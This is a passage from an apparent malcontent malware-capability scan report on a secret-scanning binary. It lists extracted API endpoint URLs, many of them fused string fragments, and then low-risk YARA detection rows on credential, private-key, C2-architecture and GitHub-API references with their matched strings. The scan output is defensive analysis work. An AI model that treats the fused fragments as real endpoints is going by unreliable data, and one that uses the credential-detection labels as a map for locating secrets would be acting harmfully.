[https://gtmetrix.com/api/2.0/statushttps](https://gtmetrix.com/api/2.0/statushttps)
[https://hg.mozilla.org/releases/mozilla](https://hg.mozilla.org/releases/mozilla)
[https://holidayapi.com/v1/holidays](https://holidayapi.com/v1/holidays)
[https://hooman.pipedrive.com/api/v1/users](https://hooman.pipedrive.com/api/v1/users)
[https://host.io/api/domains/ip/8.8.8.8](https://host.io/api/domains/ip/8.8.8.8)
[https://howtorotate.com/docs/tutorials/airbrake/https](https://howtorotate.com/docs/tutorials/airbrake/https)
[https://howtorotate.com/docs/tutorials/atlassian/https](https://howtorotate.com/docs/tutorials/atlassian/https)
[https://howtorotate.com/docs/tutorials/aws/request](https://howtorotate.com/docs/tutorials/aws/request)
[https://howtorotate.com/docs/tutorials/azure/https](https://howtorotate.com/docs/tutorials/azure/https)
[https://howtorotate.com/docs/tutorials/elevenlabs/https](https://howtorotate.com/docs/tutorials/elevenlabs/https)
[https://howtorotate.com/docs/tutorials/eraser/https](https://howtorotate.com/docs/tutorials/eraser/https)
[https://howtorotate.com/docs/tutorials/gcp/https](https://howtorotate.com/docs/tutorials/gcp/https)
[https://howtorotate.com/docs/tutorials/github/https](https://howtorotate.com/docs/tutorials/github/https)
[https://howtorotate.com/docs/tutorials/gitlab/https](https://howtorotate.com/docs/tutorials/gitlab/https)
[https://howtorotate.com/docs/tutorials/groq/https](https://howtorotate.com/docs/tutorials/groq/https)
[https://howtorotate.com/docs/tutorials/mailchimp/https](https://howtorotate.com/docs/tutorials/mailchimp/https)
[https://howtorotate.com/docs/tutorials/maxmind/https](https://howtorotate.com/docs/tutorials/maxmind/https)
[https://howtorotate.com/docs/tutorials/microsoftteams/.myfreshworks.com/crm/sales/api/sales_accounts/filtershttps](https://howtorotate.com/docs/tutorials/microsoftteams/.myfreshworks.com/crm/sales/api/sales_accounts/filtershttps)
[https://howtorotate.com/docs/tutorials/mongo/https](https://howtorotate.com/docs/tutorials/mongo/https)
[https://howtorotate.com/docs/tutorials/netlify//services/rest/record/v1/metadata](https://howtorotate.com/docs/tutorials/netlify//services/rest/record/v1/metadata)
[https://howtorotate.com/docs/tutorials/npm/](https://howtorotate.com/docs/tutorials/npm/)
[https://howtorotate.com/docs/tutorials/railwayapp/https](https://howtorotate.com/docs/tutorials/railwayapp/https)
[https://howtorotate.com/docs/tutorials/sendbird/https](https://howtorotate.com/docs/tutorials/sendbird/https)
[https://howtorotate.com/docs/tutorials/sendgrid/https](https://howtorotate.com/docs/tutorials/sendgrid/https)
[https://howtorotate.com/docs/tutorials/slack/](https://howtorotate.com/docs/tutorials/slack/)
[https://howtorotate.com/docs/tutorials/sourcegraph/https](https://howtorotate.com/docs/tutorials/sourcegraph/https)
[https://howtorotate.com/docs/tutorials/square/https](https://howtorotate.com/docs/tutorials/square/https)
[https://howtorotate.com/docs/tutorials/stripe/https](https://howtorotate.com/docs/tutorials/stripe/https)
[https://howtorotate.com/docs/tutorials/sumologic/https](https://howtorotate.com/docs/tutorials/sumologic/https)
[https://howtorotate.com/docs/tutorials/twilio/](https://howtorotate.com/docs/tutorials/twilio/)
[https://httpbin.org/anythingAPI](https://httpbin.org/anythingAPI)
[https://httpbin.org/status/200https](https://httpbin.org/status/200https)
[https://hub.docker.com/v2/users/loginapplication/vnd.dyspatch.2020.11](https://hub.docker.com/v2/users/loginapplication/vnd.dyspatch.2020.11)
[https://huggingface.co/api/modelsparsing](https://huggingface.co/api/modelsparsing)
[https://huggingface.co/api/whoami](https://huggingface.co/api/whoami)
[https://huggingface.cofailed](https://huggingface.cofailed)
[https://iam.googleapis.com/v1/roleshttps](https://iam.googleapis.com/v1/roleshttps)
[https://iamcredentials..](https://iamcredentials..)
[https://iamcredentials.UNIVERSE_DOMAIN/failed](https://iamcredentials.UNIVERSE_DOMAIN/failed)
[https://iamcredentials.googleapis.com/openpgp](https://iamcredentials.googleapis.com/openpgp)
[https://iamcredentials.googleapis.com/v1/](https://iamcredentials.googleapis.com/v1/)
[https://iamcredentials.mtls.googleapis.com/buffered_file_writer_total_write_size_byteshash/adler32](https://iamcredentials.mtls.googleapis.com/buffered_file_writer_total_write_size_byteshash/adler32)
[https://id.twitch.tv/oauth2/token](https://id.twitch.tv/oauth2/token)
[https://index.docker.io/v1/Unreachable](https://index.docker.io/v1/Unreachable)
[https://industrial.api.ubidots.com/api/v1.6/variables/https](https://industrial.api.ubidots.com/api/v1.6/variables/https)
[https://interseller.io/api/campaigns/listhttps](https://interseller.io/api/campaigns/listhttps)
[https://io.adafruit.com/api/v2/ladybugtest/feeds/](https://io.adafruit.com/api/v2/ladybugtest/feeds/)
[https://jenkins.example.com](https://jenkins.example.com)
[https://keychecker.trufflesecurity.com/fingerprint/](https://keychecker.trufflesecurity.com/fingerprint/)
[https://learning.postman.com/docs/collaborating](https://learning.postman.com/docs/collaborating)
[https://linkedin.com/in/williamhgates](https://linkedin.com/in/williamhgates)
[https://localhost/deprecated_featureconnection_failureprotocol_violationindicator_overflowrestrict_violationnot_null_violationcollation_mismatchundefined_functionduplicate_databaseduplicate_functionam](https://localhost/deprecated_featureconnection_failureprotocol_violationindicator_overflowrestrict_violationnot_null_violationcollation_mismatchundefined_functionduplicate_databaseduplicate_functionam)
[https://login.chinacloudapi.cn/https](https://login.chinacloudapi.cn/https)
[https://login.eagleeyenetworks.com/g/aaa/authenticatehttps](https://login.eagleeyenetworks.com/g/aaa/authenticatehttps)
[https://login.microsoftonline.com/semaphore](https://login.microsoftonline.com/semaphore)
[https://login.microsoftonline.de/2006](https://login.microsoftonline.de/2006)
[https://login.microsoftonline.us/https](https://login.microsoftonline.us/https)
[https://mailsac.com/api/addresseshttps](https://mailsac.com/api/addresseshttps)
[https://mainnet.infura.io/v3/KNAPSACK](https://mainnet.infura.io/v3/KNAPSACK)
[https://manage.chinacloudapi.com/https](https://manage.chinacloudapi.com/https)
[https://manage.chinacloudapi.com/publishsettings/indexhttps](https://manage.chinacloudapi.com/publishsettings/indexhttps)
[https://manage.microsoftazure.de/publishsettings/indexhttp](https://manage.microsoftazure.de/publishsettings/indexhttp)
[https://manage.windowsazure.com/https](https://manage.windowsazure.com/https)
[https://manage.windowsazure.com/publishsettings/indexraw](https://manage.windowsazure.com/publishsettings/indexraw)
[https://manage.windowsazure.us/https](https://manage.windowsazure.us/https)
[https://manage.windowsazure.us/publishsettings/indexunrecognized](https://manage.windowsazure.us/publishsettings/indexunrecognized)
[https://managedhsm.azure.net/https](https://managedhsm.azure.net/https)
[https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps](https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps)
[https://management.azure.com/https](https://management.azure.com/https)
[https://management.chinacloudapi.cn/https](https://management.chinacloudapi.cn/https)
[https://management.core.chinacloudapi.cn/https](https://management.core.chinacloudapi.cn/https)
[https://management.core.cloudapi.de/data](https://management.core.cloudapi.de/data)
[https://management.core.usgovcloudapi.net/https](https://management.core.usgovcloudapi.net/https)
[https://management.core.windows.net/https](https://management.core.windows.net/https)
[https://management.microsoftazure.de/expected](https://management.microsoftazure.de/expected)
[https://management.usgovcloudapi.net/https](https://management.usgovcloudapi.net/https)
[https://mandrillapp.com/api/1.0/users/infohttps](https://mandrillapp.com/api/1.0/users/infohttps)
[https://microsoftgraph.chinacloudapi.cn/server_duration](https://microsoftgraph.chinacloudapi.cn/server_duration)
[https://microsoftgraph.chinacloudapi.cngo](https://microsoftgraph.chinacloudapi.cngo)
[https://mltb8350.hiveage.com/api/networkapplication/vnd.hybiscus](https://mltb8350.hiveage.com/api/networkapplication/vnd.hybiscus)
[https://moderationapi.com/api/v1/analyze/languagePostgres](https://moderationapi.com/api/v1/analyze/languagePostgres)
[https://mrticktock.com/app/api/is_timer_active](https://mrticktock.com/app/api/is_timer_active)
[https://my.demio.com/api/v1/ping/query](https://my.demio.com/api/v1/ping/query)
[https://nethunt.com/api/v1/zapier/triggers/readable](https://nethunt.com/api/v1/zapier/triggers/readable)
[https://neutrinoapi.net/url](https://neutrinoapi.net/url)
[https://newsapi.org/v2/everything](https://newsapi.org/v2/everything)
[https://oauth2.googleapis.com/device/codemssql](https://oauth2.googleapis.com/device/codemssql)
[https://oauth2.googleapis.com/tokenoauth2/google](https://oauth2.googleapis.com/tokenoauth2/google)
[https://oauth2.mtls.googleapis.com/tokengrpc.io/server/received_messages_per_rpcgrpc.io/client/received_messages_per_rpcgrpclb](https://oauth2.mtls.googleapis.com/tokengrpc.io/server/received_messages_per_rpcgrpc.io/client/received_messages_per_rpcgrpclb)
[https://onesignal.com/api/v1/appshttps](https://onesignal.com/api/v1/appshttps)
[https://onfleet.com/api/v2/organizationhttps](https://onfleet.com/api/v2/organizationhttps)
[https://open.larksuite.com/open](https://open.larksuite.com/open)
[https://opentelemetry.io/schemas/1.17.0grpclb](https://opentelemetry.io/schemas/1.17.0grpclb)
[https://oss.trufflehog.org/updatesillegal](https://oss.trufflehog.org/updatesillegal)
[https://ossrdbms](https://ossrdbms)
[https://otx.alienvault.com/api/v1/users/mehttps](https://otx.alienvault.com/api/v1/users/mehttps)
[https://owlbot.info/api/v4/dictionary/securityhttps](https://owlbot.info/api/v4/dictionary/securityhttps)
[https://packagecloud.io/api/v1/reposhttps](https://packagecloud.io/api/v1/reposhttps)
[https://partner_settingscategories.statsGoogle](https://partner_settingscategories.statsGoogle)
[https://pastebin.com/api/api_post.phpapplication/vnd.percy](https://pastebin.com/api/api_post.phpapplication/vnd.percy)
[https://paydirtapp.com/api/v1/clients](https://paydirtapp.com/api/v1/clients)
[https://payments.braintree](https://payments.braintree)
[https://payments.sandbox.braintree](https://payments.sandbox.braintree)
[https://pdflayer.com/downloads/invoice.htmlPlanetScale](https://pdflayer.com/downloads/invoice.htmlPlanetScale)
[https://percy.io/api/v1/projectshttps](https://percy.io/api/v1/projectshttps)
[https://person.clearbit.com/v1/people/email/alex](https://person.clearbit.com/v1/people/email/alex)
[https://pixabay.com/api/](https://pixabay.com/api/)
[https://pkg.go.dev/cloud.google.com/go/storage](https://pkg.go.dev/cloud.google.com/go/storage)
[https://pkg.go.dev/go.mongodb.org/mongo](https://pkg.go.dev/go.mongodb.org/mongo)
[https://platform.devtest.ringcentral.com/restapi/oauth/authorize](https://platform.devtest.ringcentral.com/restapi/oauth/authorize)
[https://platform.segmentapis.com/v1beta/workspaceshttps](https://platform.segmentapis.com/v1beta/workspaceshttps)
[https://plugin.api.dronahq.com/users/](https://plugin.api.dronahq.com/users/)
[https://poloniex.com/tradingApihttps](https://poloniex.com/tradingApihttps)
[https://powrbot.com/api/v1/search/single/](https://powrbot.com/api/v1/search/single/)
[https://protobuf.dev/reference/go/faq](https://protobuf.dev/reference/go/faq)
[https://ps.pndsn.com/signal/https](https://ps.pndsn.com/signal/https)
[https://ps.pndsn.com/v2/objects/https](https://ps.pndsn.com/v2/objects/https)
[https://push.databox.com](https://push.databox.com)
[https://registry.npmjs.org/](https://registry.npmjs.org/)
[https://rendyplayground.simvoly.com/api/site/members](https://rendyplayground.simvoly.com/api/site/members)
[https://rest.clicksend.com/v3/accounthttps](https://rest.clicksend.com/v3/accounthttps)
[https://rest.coinapi.io/v1/exchangeshttps](https://rest.coinapi.io/v1/exchangeshttps)
[https://rest.messagebird.com/messageshttps](https://rest.messagebird.com/messageshttps)
[https://rest.nexmo.com/account/get](https://rest.nexmo.com/account/get)
[https://rest.textmagic.com/api/v2/userhttps](https://rest.textmagic.com/api/v2/userhttps)
[https://restpack.io/api/html2pdf/usagehttps](https://restpack.io/api/html2pdf/usagehttps)
[https://restpack.io/api/screenshot/usagehttps](https://restpack.io/api/screenshot/usagehttps)
[https://rubygems.org/api/v1/gems.jsonerror](https://rubygems.org/api/v1/gems.jsonerror)
[https://run.salesblink.io/api/public/listshttps](https://run.salesblink.io/api/public/listshttps)
[https://runrun.it/api/v1.0/users](https://runrun.it/api/v1.0/users)
[https://salescookie.com/app/Api/CreateTransaction](https://salescookie.com/app/Api/CreateTransaction)
[https://sandbox.impala.travel/v1/bookings](https://sandbox.impala.travel/v1/bookings)
[https://scrutinizer](https://scrutinizer)
[https://search.censys.io/api/v1/accounthttps](https://search.censys.io/api/v1/accounthttps)
[https://selectpdf.com/api2/convert/](https://selectpdf.com/api2/convert/)
[https://sentry.io/api/0/projects/https](https://sentry.io/api/0/projects/https)
[https://service.zipapi.us/zipcode/90210/](https://service.zipapi.us/zipcode/90210/)
[https://servicebus.azure.net/https](https://servicebus.azure.net/https)
[https://servicebus.chinacloudapi.cn/https](https://servicebus.chinacloudapi.cn/https)
[https://servicebus.cloudapi.de/https](https://servicebus.cloudapi.de/https)
[https://servicebus.usgovcloudapi.net/https](https://servicebus.usgovcloudapi.net/https)
[https://servicebus.windows.net/https](https://servicebus.windows.net/https)
[https://services.reachmail.net/administration/users/current](https://services.reachmail.net/administration/users/current)
[https://shot.screenshotapi.net/screenshot](https://shot.screenshotapi.net/screenshot)
[https://simfin.com/api/v2/companies/list](https://simfin.com/api/v2/companies/list)
[https://slack.com/api/auth.testCreateCustomerCard](https://slack.com/api/auth.testCreateCustomerCard)
[https://sms.8x8.com/api/v1/subaccounts/](https://sms.8x8.com/api/v1/subaccounts/)
[https://sms.api.sinch.com/xms/v1/https](https://sms.api.sinch.com/xms/v1/https)
[https://snyk.io/api/v1/user/mefailed](https://snyk.io/api/v1/user/mefailed)
[https://soccer.sportmonks.com/api/v2.0/leagues](https://soccer.sportmonks.com/api/v2.0/leagues)
[https://sourcegraph.com/.api/graphql](https://sourcegraph.com/.api/graphql)
[https://sslmate.com/api/v2/certs/example.com](https://sslmate.com/api/v2/certs/example.com)
[https://staging.cloud](https://staging.cloud)
[https://statuspal.io/api/v1/status_pages/secretscanner/subscriptionshttps](https://statuspal.io/api/v1/status_pages/secretscanner/subscriptionshttps)
[https://storage.UNIVERSE_DOMAIN/storage/v1/gccl](https://storage.UNIVERSE_DOMAIN/storage/v1/gccl)
[https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudapi.nethttps](https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudapi.nethttps)
[https://storage.googleapis.com/storage/v1/b/](https://storage.googleapis.com/storage/v1/b/)
[https://storage.mtls.googleapis.com/storage/v1/storage](https://storage.mtls.googleapis.com/storage/v1/storage)
[https://stripo.email/emailgeneration/v1/emails](https://stripo.email/emailgeneration/v1/emails)
[https://sts.UNIVERSE_DOMAIN/v1/tokenurn](https://sts.UNIVERSE_DOMAIN/v1/tokenurn)
[https://sts.amazonaws.com/](https://sts.amazonaws.com/)
[https://sts.amazonaws.comnot](https://sts.amazonaws.comnot)
[https://technical](https://technical)
[https://test.api.amadeus.com/v1/security/oauth2/tokenhttps](https://test.api.amadeus.com/v1/security/oauth2/tokenhttps)
[https://timezoneapi.io/api/ip/](https://timezoneapi.io/api/ip/)
[https://track.customer.io/api/v1/customers/5/eventshttps](https://track.customer.io/api/v1/customers/5/eventshttps)
[https://trackapi.nutritionix.com/v2/natural/nutrients](https://trackapi.nutritionix.com/v2/natural/nutrients)
[https://trading.robinhood.com/https](https://trading.robinhood.com/https)
[https://transit.walkscore.com/transit/search/stops/](https://transit.walkscore.com/transit/search/stops/)
[https://trk.mtrl.me/categoryunexpected](https://trk.mtrl.me/categoryunexpected)
[https://trufflesecurity.com/canariesDefaultEndpointsProtocol=https](https://trufflesecurity.com/canariesDefaultEndpointsProtocol=https)
[https://trufflesecurity.com/canariesGetGeoAPI](https://trufflesecurity.com/canariesGetGeoAPI)
[https://trufflesecurity.com/contacted25519](https://trufflesecurity.com/contacted25519)
[https://trufflesecurity.com/trufflehogmax](https://trufflesecurity.com/trufflehogmax)
[https://typetalk.com/oauth2/access_token](https://typetalk.com/oauth2/access_token)
[https://unify.apideck.com/vault/consumerscouldn](https://unify.apideck.com/vault/consumerscouldn)
[https://upload.pypi.org/legacy/](https://upload.pypi.org/legacy/)
[https://uploads.github.com//dependency](https://uploads.github.com//dependency)
[https://uptime.betterstack.com/api/v2/monitorshttps](https://uptime.betterstack.com/api/v2/monitorshttps)
[https://urlscan.io/user/quotashttps](https://urlscan.io/user/quotashttps)
[https://us.qubole.com/api/v1.2/accounthttps](https://us.qubole.com/api/v1.2/accounthttps)
[https://us1.locationiq.com/v1/reverse.php](https://us1.locationiq.com/v1/reverse.php)
[https://v2.convertapi.com/user](https://v2.convertapi.com/user)
[https://v3.api.hypertrack.com/trips/expected](https://v3.api.hypertrack.com/trips/expected)
[https://v6.exchangerate](https://v6.exchangerate)
[https://vault.azure.cn/vault.microsoftazure.denot](https://vault.azure.cn/vault.microsoftazure.denot)
[https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUSGOVERNMENTCLOUDAZURE_GO_SDK_LOG_LEVELnot](https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUSGOVERNMENTCLOUDAZURE_GO_SDK_LOG_LEVELnot)
[https://vault.azure.net/mysql.database.azure.comhttps](https://vault.azure.net/mysql.database.azure.comhttps)
[https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps](https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps)
[https://vault.microsoftazure.de/specific](https://vault.microsoftazure.de/specific)
[https://vault.microsoftazure.dedata](https://vault.microsoftazure.dedata)
[https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp](https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp)
[https://vault.usgovcloudapi.nethttps](https://vault.usgovcloudapi.nethttps)
[https://verifier.meetchopra.com/verify/](https://verifier.meetchopra.com/verify/)
[https://verify.twilio.com/v2/Servicesif](https://verify.twilio.com/v2/Servicesif)
[https://vpnapi.io/api/8.8.8.8](https://vpnapi.io/api/8.8.8.8)
[https://weather.ls.hereapi.com/weather/1.0/report.json](https://weather.ls.hereapi.com/weather/1.0/report.json)
[https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/LA](https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/LA)
[https://webexapis.com/v1/access_tokenhttps](https://webexapis.com/v1/access_tokenhttps)
[https://ws.detectlanguage.com/0.2/user/statushttps](https://ws.detectlanguage.com/0.2/user/statushttps)
[https://www.World](https://www.World)
[https://www.apilayer.net/api/validate](https://www.apilayer.net/api/validate)
[https://www.apimatic.io/api/code](https://www.apimatic.io/api/code)
[https://www.appsynergy.com/api](https://www.appsynergy.com/api)
[https://www.bitmex.com](https://www.bitmex.com)
[https://www.browserstack.com/automate/plan.jsonhttps](https://www.browserstack.com/automate/plan.jsonhttps)
[https://www.buddyns.com/api/v2/zone/https](https://www.buddyns.com/api/v2/zone/https)
[https://www.bugherd.com/api_v2/projects.jsonhttps](https://www.bugherd.com/api_v2/projects.jsonhttps)
[https://www.carboninterface.com/api/v1/estimateshttps](https://www.carboninterface.com/api/v1/estimateshttps)
[https://www.clinchpad.com/api/v1/pipelines](https://www.clinchpad.com/api/v1/pipelines)
[https://www.diggernaut.com/api/projectshttps](https://www.diggernaut.com/api/projectshttps)
[https://www.dnscheck.co/api/v1/groups/https](https://www.dnscheck.co/api/v1/groups/https)
[https://www.easy](https://www.easy)
[https://www.eventbriteapi.com/v3/users/me/](https://www.eventbriteapi.com/v3/users/me/)
[https://www.flickr.com/services/rest/](https://www.flickr.com/services/rest/)
[https://www.formbucket.com/v1/profilehttps](https://www.formbucket.com/v1/profilehttps)
[https://www.gocanvas.com/apiv2/forms.xml](https://www.gocanvas.com/apiv2/forms.xml)
[https://www.googleapis.com/auth/cloud](https://www.googleapis.com/auth/cloud)
[https://www.googleapis.com/auth/devstorage.full_controlstorage](https://www.googleapis.com/auth/devstorage.full_controlstorage)
[https://www.googleapis.com/auth/devstorage.read_onlywildcards](https://www.googleapis.com/auth/devstorage.read_onlywildcards)
[https://www.googleapis.com/auth/devstorage.read_writeB](https://www.googleapis.com/auth/devstorage.read_writeB)
[https://www.googleapis.com/auth/devstorage.read_writecredentials](https://www.googleapis.com/auth/devstorage.read_writecredentials)
[https://www.googleapis.com/blogger/v3/blogs/2399953](https://www.googleapis.com/blogger/v3/blogs/2399953)
[https://www.googleapis.com/oauth2/v3/tokeninfo](https://www.googleapis.com/oauth2/v3/tokeninfo)
[https://www.googleapis.com/youtube/v3/channelSections](https://www.googleapis.com/youtube/v3/channelSections)
[https://www.happyscribe.com/api/v1/transcriptionshttps](https://www.happyscribe.com/api/v1/transcriptionshttps)
[https://www.humanity.com/api/v2/me](https://www.humanity.com/api/v2/me)
[https://www.ipqualityscore.com/api/json/account/](https://www.ipqualityscore.com/api/json/account/)
[https://www.mapquestapi.com/datamanager/v2/get](https://www.mapquestapi.com/datamanager/v2/get)
[https://www.meistertask.com/api/projectsapplication/vnd.moonclerk](https://www.meistertask.com/api/projectsapplication/vnd.moonclerk)
[https://www.mindmeister.com/services/rest/oauth2](https://www.mindmeister.com/services/rest/oauth2)
[https://www.mongodb.com/supportability/cosmosdb](https://www.mongodb.com/supportability/cosmosdb)
[https://www.mongodb.com/supportability/documentdbAzure](https://www.mongodb.com/supportability/documentdbAzure)
[https://www.nuget.org/api/v2/packagehttps](https://www.nuget.org/api/v2/packagehttps)
[https://www.parsehub.com/api/v2/projects](https://www.parsehub.com/api/v2/projects)
[https://www.pivotaltracker.com/services/v5/mehttps](https://www.pivotaltracker.com/services/v5/mehttps)
[https://www.planyo.com/rest/](https://www.planyo.com/rest/)
[https://www.postman.com/_api/workspace/](https://www.postman.com/_api/workspace/)
[https://www.protocols.io/api/v3/session/profilerequest](https://www.protocols.io/api/v3/session/profilerequest)
[https://www.recent](https://www.recent)
[https://www.strava.com/oauth/tokenhttps](https://www.strava.com/oauth/tokenhttps)
[https://www.streak.com/api/v1/pipelineshttps](https://www.streak.com/api/v1/pipelineshttps)
[https://www.tefter.io/api/bookmarks](https://www.tefter.io/api/bookmarks)
[https://www.versioneye.com/api/v1/scanshttps](https://www.versioneye.com/api/v1/scanshttps)
[https://www.virustotal.com/api/v3/metadatahttps](https://www.virustotal.com/api/v3/metadatahttps)
[https://www.worldcoinindex.com/apiservice/ticker](https://www.worldcoinindex.com/apiservice/ticker)
[https://www.zipcodeapi.com/rest/](https://www.zipcodeapi.com/rest/)
[https://yourdomain.com/samplecallback](https://yourdomain.com/samplecallback)
[https://yourwebsite.com/callbacks_handler/BuddyNS](https://yourwebsite.com/callbacks_handler/BuddyNS) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [AMD64](https://github.com/search?q=AMD64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code)
[http://](http://)
[https://](https://)
[x86_64](https://github.com/search?q=x86_64&type=code) | -| LOW | [collect/code/github_api](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/code/github_api.yara#github_api_user) | access GitHub API | [api.github.com](https://github.com/search?q=api.github.com&type=code)
[google/go-github](https://github.com/search?q=google%2Fgo-github&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [- pairs with password](https://github.com/search?q=-+pairs+with+password&type=code)
[AllowCleartextPasswords](https://github.com/search?q=AllowCleartextPasswords&type=code)
[AllowEmptyPassword](https://github.com/search?q=AllowEmptyPassword&type=code)
[AllowNativePasswords](https://github.com/search?q=AllowNativePasswords&type=code)
[AllowOldPasswords](https://github.com/search?q=AllowOldPasswords&type=code)
[Attribute SyntaxPassword must be changed](https://github.com/search?q=Attribute+SyntaxPassword+must+be+changed&type=code)
[CertificatePasswordvprotobuf](https://github.com/search?q=CertificatePasswordvprotobuf&type=code)
[ChangePasswordLength](https://github.com/search?q=ChangePasswordLength&type=code)
[ChangePasswordOffset](https://github.com/search?q=ChangePasswordOffset&type=code)
[ChangePasswordOptions](https://github.com/search?q=ChangePasswordOptions&type=code)
[ControlVChuPasswordMustChange](https://github.com/search?q=ControlVChuPasswordMustChange&type=code)
[ControlVChuPasswordWarning](https://github.com/search?q=ControlVChuPasswordWarning&type=code)
[Elasticsearch password](https://github.com/search?q=Elasticsearch+password&type=code)
[FilePasswordFunc](https://github.com/search?q=FilePasswordFunc&type=code)
[GetCertificatePassword](https://github.com/search?q=GetCertificatePassword&type=code)
[GetPassword](https://github.com/search?q=GetPassword&type=code)
[GetVCSPassword](https://github.com/search?q=GetVCSPassword&type=code)
[GetVerifiablePasswordAuthentication](https://github.com/search?q=GetVerifiablePasswordAuthentication&type=code)
[KeychainPasswordFunc](https://github.com/search?q=KeychainPasswordFunc&type=code)
[NewChangePasswordFunc](https://github.com/search?q=NewChangePasswordFunc&type=code)
[NewControlBeheraPasswordPolicy](https://github.com/search?q=NewControlBeheraPasswordPolicy&type=code)
[NewReaderWithPassword](https://github.com/search?q=NewReaderWithPassword&type=code)
[Pairs with password](https://github.com/search?q=Pairs+with+password&type=code)
[PasscodeInPassword](https://github.com/search?q=PasscodeInPassword&type=code)
[Password from](https://github.com/search?q=Password+from&type=code)
[PasswordAuthenticator](https://github.com/search?q=PasswordAuthenticator&type=code)
[PasswordChanged](https://github.com/search?q=PasswordChanged&type=code)
[PasswordCredentialsToken](https://github.com/search?q=PasswordCredentialsToken&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[PasswordHashIterations](https://github.com/search?q=PasswordHashIterations&type=code)
[PasswordModify](https://github.com/search?q=PasswordModify&type=code)
[PasswordRegexCheck](https://github.com/search?q=PasswordRegexCheck&type=code)
[PasswordSet](https://github.com/search?q=PasswordSet&type=code)
[SASLprepping password](https://github.com/search?q=SASLprepping+password&type=code)
[SecureSettingsPassword](https://github.com/search?q=SecureSettingsPassword&type=code)
[allowCleartextPasswords](https://github.com/search?q=allowCleartextPasswords&type=code)
[allowOldPasswords](https://github.com/search?q=allowOldPasswords&type=code)
[authRequiresPassword](https://github.com/search?q=authRequiresPassword&type=code)
[certificatePassword](https://github.com/search?q=certificatePassword&type=code)
[certificate_password](https://github.com/search?q=certificate_password&type=code)
[change_passwordsecurity](https://github.com/search?q=change_passwordsecurity&type=code)
[changepassword](https://github.com/search?q=changepassword&type=code)
[dPassword Policy - Behera](https://github.com/search?q=dPassword+Policy+-+Behera&type=code)
[empty password](https://github.com/search?q=empty+password&type=code)
[encryptPassword](https://github.com/search?q=encryptPassword&type=code)
[errEmptyPassword](https://github.com/search?q=errEmptyPassword&type=code)
[for ChangePassword](https://github.com/search?q=for+ChangePassword&type=code)
[in list of old passwordsldap](https://github.com/search?q=in+list+of+old+passwordsldap&type=code)
[incorrect passwordrardecode](https://github.com/search?q=incorrect+passwordrardecode&type=code)
[json into Changepassword request](https://github.com/search?q=json+into+Changepassword+request&type=code)
[key is not password protectedssh](https://github.com/search?q=key+is+not+password+protectedssh&type=code)
[manglePassword](https://github.com/search?q=manglePassword&type=code)
[meetsCouchbasePasswordRequirements](https://github.com/search?q=meetsCouchbasePasswordRequirements&type=code)
[meetsSnowflakePasswordRequirements](https://github.com/search?q=meetsSnowflakePasswordRequirements&type=code)
[mongoPasswordDigest](https://github.com/search?q=mongoPasswordDigest&type=code)
[native_passwordinvalid dbname](https://github.com/search?q=native_passwordinvalid+dbname&type=code)
[nil ValueWriterpassword must not be set](https://github.com/search?q=nil+ValueWriterpassword+must+not+be+set&type=code)
[no username and password are provided](https://github.com/search?q=no+username+and+password+are+provided&type=code)
[old_passwordsRepositories to](https://github.com/search?q=old_passwordsRepositories+to&type=code)
[parseUserPassword](https://github.com/search?q=parseUserPassword&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[passwordFunc](https://github.com/search?q=passwordFunc&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code)
[password_change_date](https://github.com/search?q=password_change_date&type=code)
[password_hash](https://github.com/search?q=password_hash&type=code)
[passwordattachment](https://github.com/search?q=passwordattachment&type=code)
[passwordf](https://github.com/search?q=passwordf&type=code)
[passworduser](https://github.com/search?q=passworduser&type=code)
[qunexpected password response](https://github.com/search?q=qunexpected+password+response&type=code)
[requires old password authentication](https://github.com/search?q=requires+old+password+authentication&type=code)
[saltPassword](https://github.com/search?q=saltPassword&type=code)
[scrambleOldPassword](https://github.com/search?q=scrambleOldPassword&type=code)
[scramblePassword](https://github.com/search?q=scramblePassword&type=code)
[secure_settings_password](https://github.com/search?q=secure_settings_password&type=code)
[sendEncryptedPassword](https://github.com/search?q=sendEncryptedPassword&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[the ChangePassword query execution](https://github.com/search?q=the+ChangePassword+query+execution&type=code)
[username AND password](https://github.com/search?q=username+AND+password&type=code)
[username or password was specified](https://github.com/search?q=username+or+password+was+specified&type=code)
[vcs_password](https://github.com/search?q=vcs_password&type=code)
[verifiable_password_authentication](https://github.com/search?q=verifiable_password_authentication&type=code)
[winvalid password](https://github.com/search?q=winvalid+password&type=code) | -| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [privateKey](https://github.com/search?q=privateKey&type=code)
[private_key](https://github.com/search?q=private_key&type=code)
[privatekey](https://github.com/search?q=privatekey&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
[aes_256_cbc](https://github.com/search?q=aes_256_cbc&type=code)
